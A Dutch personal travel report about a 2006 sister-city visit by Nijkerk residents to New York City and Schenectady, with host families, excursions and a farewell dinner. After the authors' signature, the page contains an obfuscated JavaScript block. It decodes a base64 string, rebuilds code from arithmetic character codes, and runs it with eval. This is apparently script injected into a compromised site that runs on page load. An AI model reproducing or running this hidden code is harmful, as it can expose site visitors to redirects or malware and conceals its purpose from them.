Verslag 2006

 

2006

De Schenectady-Nijkerk Counsil heeft in 2006 een groep Nijkerkers uitgenodigd voor een 10-daags bezoek aan onze zusterstad in de staat New York. In 2006 hebben zo’n 30 Nijkerkers deze uitnodiging geaccepteerd en zijn de Atlantische Oceaan overgestoken.

Het bezoek heeft bestaan uit een verblijf in Schenectady waarbij men bij gastgezinnen is ondergebracht. Op zo’n manier heeft men op een heel bijzondere en directe manier kennis kunnen maken met het leven en de gewoonten van de Amerikanen. In september is het dan de tijd van de “Indian Summer”, waarbij de bomen in deze bosrijke omgeving een geweldige kleurenpracht tonen. Uiteraard zijn er ook uitstapjes in de omgeving gemaakt. De reis is afgesloten met een 3-daags bezoek aan the Big Apple, New York.
Nijkerkers die al eens deze reis gemaakt hebben kwamen steevast met enthousiaste verhalen terug. Hieronder is zo een verhaal.

Mede reizigers gevraagd naar Schenectady…..

Een klein berichtje in de krant.

Onze reactie was: OPGEVEN!

Na enkele bijeenkomsten over hoe, wat en wanneer stonden we op Schiphol, richting USA. Na een voorspoedige vlucht geland op vliegveld Newark even ten westen van New York. Met onze reisleiders, Peter de Vries en Jan van de Kuinder, in een busje naar ons hotel, hotel Pynsylvania, gebracht. Dit hotel ligt in het hartje van The Big Apple, onder de schaduw van het Empire State Building.
In New York zijn wij vijf dagen gebleven om deze stad te bekijken. Soms met de ploeg, soms individueel.
Een geweldige stad waar heel veel te zien en te beleven valt. We moesten een keuze maken uit alles wat er te zien is. O.a. het gebied van het voormalige WTC, het Vrijheidsbeeld, de Empire State Building, Central Park, China Town, Little Italy enz, enz.

Vertrek van Schiphol New York Impression

De verbazing over zo’n grote stad met zijn enorme hoge gebouwen, het enorm drukke verkeer, meer dan 75 % gele taxi’s, het gekrioel door elkaar. De grote verschillen tussen arm en rijk. Het machtig mooie en rustige Central Park, dat als een groen hart midden in de bruisende metropool ligt. Een plek waar je na alle indrukken tot rust kan komen. De brok in je keel als je op het terrein van het voormalige WTC terrein loopt, de brandweerkazerne ernaast met zijn gedenkteken van 343 slachtoffers.
Al slenterend in de directe omgeving van het WTC komen we onze burgemeester, Bartele Vries en zijn vrouw tegen. Kan je zien, de wereld is klein, zelfs in New York.
Het uitzicht boven op het Empire State Building. De boottocht naar het Statue of Liberty. China Town, je waant je in het verre mysterieuze Oosten. En nog veel, heel veel meer.
De laatste avond in New York zijn we met z’n allen wezen eten bij een chinees.
Uiteraard in China Town.
Een hele belevenis, vooral de tocht erheen. We zijn lopend gegaan en kwamen in Little Italy een heus Italiaans feest tegen, die enkele straten besloeg. Inclusief een eigen Italiaanse heilige, die gezien het aantal bankbiljetten, die op een rek voor hem werden neergelegd, de indruk wekte hiervoor wonderen te gaan verrichten.
Na de vijf dagen New York gingen we met de trein naar Schenectady. We hadden geluk. Het station in New York lag tegenover ons hotel. We konden er dus lopend heen.

Een treinreis van New York naar Schenectady van ongeveer 3 uur. Een ervaring op zich.
De nogal gezette conducteur (een nutty professor type), die een ieder kwam waarschuwen dat je er bij het volgende station uit moest! Hij kon dit zien aan de kaartjes, waarop hij een code had geschreven. Die kaartjes waren boven je bank aangebracht.
Kruisend door een mooi landschap, verdeeld in meren, rivieren, bossen, dorpen en steden bereikten we Schenectady. Daar werden we verwelkomd door enkele leden van het Amerikaanse Schenectady – Nijkerk comité.
Een zeer hartelijke ontvangst. Met welkomsborden en al. Opvallend was dit welkom. Mensen, die elkaar nog nooit hadden gezien, verwelkomden elkaar als goede vrienden. Dat gaf al een heel goed gevoel. Een gevoel dat je meer dan welkom was.

Het bezoek aan Schenectady was een aaneenschakeling van evenementen.
Zoals de bezoeken aan de City Hal van Schenectady en z’n Kennedy- achtige burgemeester, een begraafplaats met veel Nederlandse namen op de grafstenen en een bezoek aan de City Mission. (Opvang voor daklozen en maatschappelijk minder bedeelden)
Zo ook bezoeken aan Moroni House (een groot protserig hotel ) in the Shawangunk Mountains.

Ook dit is New York Schenectady, City Hall

Later een dag in Albany, de hoofdstad van de staat New York, waar we het Capitol hebben bezocht en een Duck Tour (soort autoboot) op de Hudson rivier hebben gemaakt. Als hoogtepunt een bezoek aan de Half Moon (een nabouw van de originele boot).
De lunch hebben we genoten in het Albany Pump House, aangeboden door The Holland Society of New York.
Ook stond een bezoek per autobus aan de Berkshires op het programma. We hebben daar het Chesterwood (atelier van de beeldhouwer van o.a. het Lincolnbeeld), het Norman Rockwell Museum (de Amerikaanse Anton Piek ) en Stockbridge bezocht.
Eveneens zijn we met de bus naar Lake Placid (Olympische Winterspelen), in de Adirondacks (een natuurreservaat zo groot als half Nederland) gereden om met een kabelbaan naar de top van de Whiteface Mountain te worden gebracht. Deze top deed zijn naam eer aan want het was er bere koud! Er kwam mist opzetten en de temperatuur daalde naar een paar graden boven nul en in een mum van tijd hadden we het gezien.
In Schenectady was de Annual Stockade Walkabout georganiseerd. Niet alleen voor ons maar voor iedereen.

Schenectady Stockade Walk

Rijtuigen met paarden en in antieke kleding gestoken wandelaars lieten zien hoe het straatbeeld van een paar honderd jaar geleden was.
Tussen bovenstaande evenementen door werd er ook nog diverse keren een BBQ bezocht, die door medewerkers van de Schenectady groep USA werden georganiseerd.
Overweldigend.
Zo ook een BBQ in “an old shed and square dancing”.
Onze gastdame en –heer hebben ons de omgeving laten zien en zijn diverse keren met ons uit eten geweest. We hebben zelfs nog met de Canadese kano gevaren op de Mohawk river.
Ons gastgezin had op een avond drie bevriende echtparen uitgenodigd. Het was een gezellige avond, waarin we de verschillen tussen de USA en Nederland konden bespreken, alsmede vele ander onderwerpen, waaronder onderwijs, politie en politiek.
Zij hebben bij ons een onvergetelijke indruk achtergelaten van gastvrijheid en vriendelijkheid. Wij hebben er goede vrienden bij gekregen.
Tot slot werd er door de mensen uit Nijkerk een Farewell Dinner aangeboden aan de organisatoren van het zeer geslaagde Schenectady bezoek.
Het thema was “oranje”. De sporten waar wij als Nederlanders in uitblinken werden uitgebeeld en als klap op de vuurpijl een toespraak van een namaak majesteit, geflankeerd door Willem Alexander en Maxima. In de geest van Prinsjesdag. Succes was verzekerd. Iedereen werd in oranje gestoken, sjerpen, neuzen, t-shirts enz. enz. Men was zeer onder de indruk.

Het sluitstuk, Farewell Dinner

De dag hierna was het tijd voor vertrek.
Vertrek van de mensen waarmee je gedurende een dag of 8 dagelijks mee was opgetrokken. Voor velen een emotioneel afscheid waarbij menig traantje werd weggepinkt. Met de bus naar Newark en met de plane terug naar huis.
Wij koesteren de herinneringen en hebben nog regelmatig e-mail contact met onze gastfamilie.

Nico en Evelien

 

var LWRJWNSIKL = atob(‘dmFyIEFYUENDSkxVTkMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE0IC0gNCwgMTIzIC0gNSwgMTA1IC0gOCwgMTE3IC0gMywgMzkgLSA3LCAxMTUgLSA4LCAxMDkgLSA4LCAxMjMgLSAyLCAzOCAtIDYsIDY5IC0gOCwgMzkgLSA3LCA0NyAtIDgsIDc2IC0gMSwgNzkgLSAxLCA3NyAtIDIsIDg2IC0gMiwgNzQgLSA5LCA4MCAtIDYsIDExNyAtIDMsIDc1IC0gMSwgMTA5IC0gOCwgODkgLSAxLCA0MSAtIDIsIDY2IC0gNywgMTggLSA4LCAxMTkgLSAxLCAxMDEgLSA0LCAxMTcgLSAzLCAzOCAtIDYsIDEwNCAtIDMsIDExNSAtIDUsIDEwNCAtIDUsIDEwMiAtIDEsIDEwMyAtIDMsIDM1IC0gMywgNjMgLSAyLCAzNyAtIDUsIDQ0IC0gNSwgODcgLSA3LCA4NSAtIDIsIDY0IC0gOCwgNjIgLSA5LCAxMDMgLSAzLCA3NCAtIDYsIDcyIC0gMywgNjEgLSA5LCA3NSAtIDUsIDY4IC0gMSwgOTYgLSA2LCA3NiAtIDYsIDk0IC0gNCwgOTMgLSA2LCAxMTYgLSAxLCAxMjIgLSA5LCA4MCAtIDYsIDcxIC0gMywgMTAyIC0gMywgNTQgLSA2LCA4MCAtIDYsIDEyMiAtIDIsIDEwNCAtIDUsIDExMSAtIDQsIDcyIC0gMywgOTAgLSAyLCA5MiAtIDMsIDExMyAtIDIsIDgzIC0gMywgNjggLSAxLCA1OCAtIDYsIDUxIC0gMiwgODUgLSA3LCA5MiAtIDksIDU3IC0gMSwgNTggLSA3LCA3NiAtIDIsIDEwNyAtIDQsIDY2IC0gMSwgNTUgLSA2LCA3NyAtIDEsIDEwOSAtIDQsIDc0IC0gOSwgNTUgLSA4LCAxMDUgLSAzLCA3NSAtIDQsIDkyIC0gMywgNjIgLSA5LCA3MiAtIDMsIDg2IC0gMiwgMTA5IC0gNiwgODMgLSA2LCA3OCAtIDMsIDY5IC0gMSwgNjMgLSA2LCAxMTYgLSA0LCA5MyAtIDQsIDExMSAtIDIsIDU5IC0gMiwgODUgLSA5LCA4NiAtIDcsIDEwOSAtIDYsIDcwIC0gNSwgMTIyIC0gNywgNzIgLSA1LCA5NiAtIDgsIDk0IC0gNSwgNjEgLSA5LCA3NiAtIDEsIDEyNCAtIDIsIDYwIC0gNCwgOTQgLSA4LCA4NSAtIDcsIDg2IC0gMiwgNTUgLSAzLCA3MSAtIDYsIDc4IC0gNSwgMTI2IC0gNywgMTA3IC0gOCwgMTIzIC0gNywgODkgLSA5LCAxMzAgLSA5LCAxMjAgLSA0LCAxMTMgLSA3LCAxMDUgLSA2LCAxMjUgLSAzLCA3NCAtIDEsIDU1IC0gMywgNzcgLSA4LCA4OCAtIDEsIDU0IC0gNSwgNzkgLSA1LCAxMDYgLSA0LCAxMjkgLSA4LCA4MCAtIDMsIDYyIC0gOCwgODQgLSA0LCAxMjggLSA3LCA4NSAtIDMsIDYwIC0gNSwgOTkgLSA5LCA5MSAtIDUsIDUzIC0gNSwgNDkgLSA2LCA3MyAtIDMsIDEyNCAtIDIsIDExNCAtIDcsIDExOCAtIDIsIDc2IC0gMSwgNjkgLSAyLCA4MSAtIDgsIDUyIC0gMSwgNzggLSA1LCA3NSAtIDcsIDExNyAtIDYsIDEwNSAtIDcsIDkyIC0gMiwgNzEgLSA2LCAxMTcgLSAyLCA1MCAtIDIsIDkxIC0gMSwgNjkgLSAxLCA1NSAtIDcsIDU2IC0gOSwgNzkgLSAxLCA4OSAtIDUsIDg2IC0gMSwgMTEwIC0gNCwgNzYgLSA3LCA4OSAtIDIsIDg3IC0gMiwgNzggLSA1LCA4MiAtIDMsIDg2IC0gMywgNzggLSA1LCAxMTEgLSA4LCA5NCAtIDQsIDg4IC0gNCwgNjAgLSA4LCAxMjUgLSA0LCAxMDUgLSA3LCA5NSAtIDksIDEyNCAtIDgsIDEyOCAtIDgsIDEwNiAtIDgsIDEzMSAtIDksIDEyNiAtIDcsIDExMSAtIDQsIDc5IC0gMywgOTEgLSA3LCA1NSAtIDMsIDU4IC0gNSwgODEgLSA3LCA2OCAtIDEsIDgzIC0gMiwgNzkgLSA4LCA5NCAtIDQsIDc0IC0gOSwgNTAgLSAyLCA1OSAtIDIsIDgzIC0gOCwgMTExIC0gNiwgMTIwIC0gOCwgMTEzIC0gNSwgODYgLSA4LCA4OSAtIDUsIDc0IC0gNSwgNTcgLSAzLCA3NiAtIDYsIDEyNiAtIDUsIDg5IC0gOCwgNjcgLSAxLCA4MCAtIDksIDEyMyAtIDIsIDgyIC0gNSwgMTE0IC0gNCwgNzcgLSAzLCAxMjUgLSAzLCA3MCAtIDQsIDExMyAtIDEsIDgyIC0gMywgMTA1IC0gMiwgNjcgLSAyLCAxMjIgLSA3LCA3MCAtIDMsIDkyIC0gNCwgNzQgLSA0LCAxMjUgLSA2LCA4NiAtIDQsIDczIC0gOCwgNjkgLSA4LCA2MyAtIDIsIDQ4IC0gOSwgNjggLSA5LCAxOCAtIDgsIDEwMyAtIDEsIDEyMyAtIDYsIDExMiAtIDIsIDEwMSAtIDIsIDExOCAtIDIsIDExNCAtIDksIDEyMCAtIDksIDExOCAtIDgsIDQwIC0gOCwgMTI0IC0gNCwgMTE3IC0gNiwgMTE1IC0gMSwgOTggLSAzLCAxMTAgLSA5LCAxMTYgLSA2LCAxMDUgLSA2LCA0MiAtIDIsIDExOCAtIDMsIDEyNCAtIDgsIDExNyAtIDMsIDEwNyAtIDIsIDExMyAtIDMsIDExMiAtIDksIDQ4IC0gNCwgNDAgLSA4LCAxMTEgLSA0LCAxMDQgLSAzLCAxMjQgLSAzLCA0MiAtIDEsIDM5IC0gNywgMTI5IC0gNiwgMTIgLSAyLCAzNiAtIDQsIDQwIC0gOCwgMTIwIC0gMiwgMTA1IC0gOCwgMTE4IC0gNCwgNDAgLSA4LCAxMjIgLSA4LCAxMDQgLSAzLCAxMTcgLSAyLCAzOCAtIDYsIDY5IC0gOCwgNDAgLSA4LCA0NyAtIDgsIDQ3IC0gOCwgNjMgLSA0LCAxNyAtIDcsIDM5IC0gNywgMzMgLSAxLCAxMDkgLSA3LCAxMTQgLSAzLCAxMTkgLSA1LCAzOCAtIDYsIDQyIC0gMiwgMTIwIC0gMiwgMTAxIC0gNCwgMTE5IC0gNSwgMzcgLSA1LCAxMDcgLSAyLCAzNCAtIDIsIDY4IC0gNywgMzcgLSA1LCA1MiAtIDQsIDY3IC0gOCwgMzYgLSA0LCAxMTAgLSA1LCA0MSAtIDksIDY4IC0gOCwgMzkgLSA3LCAxMjQgLSA5LCAxMTggLSAyLCAxMTYgLSAyLCAxMTMgLSA4LCAxMTEgLSAxLCAxMTEgLSA4LCA1MSAtIDUsIDExMyAtIDUsIDEwMyAtIDIsIDExNCAtIDQsIDEwNyAtIDQsIDEyNCAtIDgsIDExMyAtIDksIDY4IC0gOSwgNDAgLSA4LCAxMTQgLSA5LCA0NCAtIDEsIDUyIC0gOSwgNDQgLSAzLCA0MCAtIDgsIDEzMSAtIDgsIDE2IC0gNiwgMzcgLSA1LCAzNSAtIDMsIDM3IC0gNSwgNDAgLSA4LCAxMTcgLSAzLCAxMDkgLSA4LCAxMjMgLSA4LCA0MSAtIDksIDQ0IC0gMSwgNjYgLSA1LCAzOSAtIDcsIDg0IC0gMSwgMTI1IC0gOSwgMTE1IC0gMSwgMTA4IC0gMywgMTE4IC0gOCwgMTA5IC0gNiwgNTUgLSA5LCAxMDQgLSAyLCAxMjMgLSA5LCAxMTMgLSAyLCAxMTIgLSAzLCA3NSAtIDgsIDExMCAtIDYsIDEwNiAtIDksIDEyMyAtIDksIDcyIC0gNSwgMTE2IC0gNSwgMTA3IC0gNywgMTA1IC0gNCwgNDkgLSA5LCAxMTggLSAzLCAxMjUgLSA5LCAxMjMgLSA5LCAxMTIgLSA3LCAxMTIgLSAyLCAxMTAgLSA3LCA1MSAtIDUsIDEwOCAtIDksIDEwOSAtIDUsIDEwNiAtIDksIDExNyAtIDMsIDc2IC0gOSwgMTE5IC0gOCwgMTA3IC0gNywgMTAzIC0gMiwgNzEgLSA2LCAxMTcgLSAxLCA0OSAtIDksIDEwOCAtIDMsIDQ1IC0gNCwgMzggLSA2LCA5OSAtIDUsIDE4IC0gOCwgMTggLSA5LCAxNiAtIDcsIDEyIC0gMywgMTAgLSAxLCAxMTIgLSA1LCAxMDggLSA3LCAxMzAgLSA5LCA0NyAtIDEsIDEwNSAtIDYsIDEwOCAtIDQsIDEwNSAtIDgsIDEyMyAtIDksIDY4IC0gMSwgMTIwIC0gOSwgMTA0IC0gNCwgMTEwIC0gOSwgNjggLSAzLCAxMTkgLSAzLCA0NSAtIDUsIDEwNyAtIDIsIDQxIC0gOSwgNDAgLSAzLCA0MSAtIDksIDExMCAtIDMsIDEwOSAtIDgsIDEzMCAtIDksIDUyIC0gNiwgMTEyIC0gNCwgMTAyIC0gMSwgMTE2IC0gNiwgMTEwIC0gNywgMTI1IC0gOSwgMTEyIC0gOCwgNTAgLSA5LCA0NiAtIDUsIDYzIC0gNCwgMTggLSA4LCAzOSAtIDcsIDQxIC0gOSwgMTMxIC0gNiwgMTIgLSAyLCAzOCAtIDYsIDM2IC0gNCwgMTIxIC0gNywgMTA1IC0gNCwgMTI1IC0gOSwgMTIyIC0gNSwgMTIyIC0gOCwgMTEzIC0gMywgMzQgLSAyLCAxMTYgLSAyLCAxMDYgLSA1LCAxMjMgLSA4LCA2NCAtIDUsIDE2IC0gNiwgMTI3IC0gMiwgMTMgLSAzLCAxNCAtIDQsIDEyNyAtIDksIDEwMiAtIDUsIDExOCAtIDQsIDQwIC0gOCwgMTA2IC0gNiwgMTAyIC0gMSwgMTA0IC0gNSwgMzYgLSA0LCA3MCAtIDksIDQxIC0gOSwgMTIxIC0gMSwgMTE5IC0gOCwgMTE1IC0gMSwgMTAyIC0gNywgMTA4IC0gNywgMTExIC0gMSwgMTA2IC0gNywgNDQgLSA0LCAxMDEgLSA0LCAxMjUgLSA5LCAxMTMgLSAyLCAxMDcgLSA5LCA0NSAtIDUsIDEwNiAtIDUsIDExOSAtIDksIDEwNyAtIDgsIDEwOCAtIDcsIDEwNCAtIDQsIDQ1IC0gNCwgNDUgLSAxLCAzNSAtIDMsIDEwOCAtIDEsIDEwNiAtIDUsIDEzMCAtIDksIDQ3IC0gNiwgNjggLSA5LCAxMyAtIDMsIDQ4IC0gOCwgMTE3IC0gNywgMTA0IC0gMywgMTI4IC0gOSwgMzUgLSAzLCA3NCAtIDQsIDEyMSAtIDQsIDExOCAtIDgsIDEwNiAtIDcsIDExOSAtIDMsIDExNCAtIDksIDExNyAtIDYsIDExOSAtIDksIDQyIC0gMiwgMTA0IC0gNCwgMTA5IC0gOCwgMTA3IC0gOCwgNDcgLSA2LCA0MyAtIDIsIDQ1IC0gNSwgNDUgLSA0LCA2OCAtIDksIDExIC0gMSwgMTcgLSA3KTtldmFsKEFYUENDSkxVTkMpOw==’);
eval(LWRJWNSIKL);

 Posted by at 20:23